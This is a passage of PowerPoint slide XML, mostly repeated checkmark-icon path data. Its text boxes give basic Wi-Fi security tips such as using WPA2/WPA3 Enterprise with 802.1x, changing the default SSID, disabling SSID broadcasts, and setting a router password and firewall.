                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8558774" y="2971800"/>
            <a:ext cx="2797841" cy="871555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54381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Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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Enterprise WPA2 with 802.1x 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authentication instead of WPA and WEP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257144" y="3048461"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans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8558774" y="3926854"/>
            <a:ext cx="2797841" cy="617639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54381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Implement </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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WPA2/WPA3 Enterprise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 wherever possible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257144" y="4003515"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans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697870" y="4628003"/>
            <a:ext cx="2797841" cy="363724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54381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Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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SSID broadcasts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396240" y="4658944"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans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697870" y="2971800"/>
            <a:ext cx="2797841" cy="617639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54381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Change the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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default SSID 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after WLAN configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396240" y="3048461"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans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697870" y="3763830"/>
            <a:ext cx="3124219" cy="617639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54381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Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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router access password 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and enable firewall protection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396240" y="3840491"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
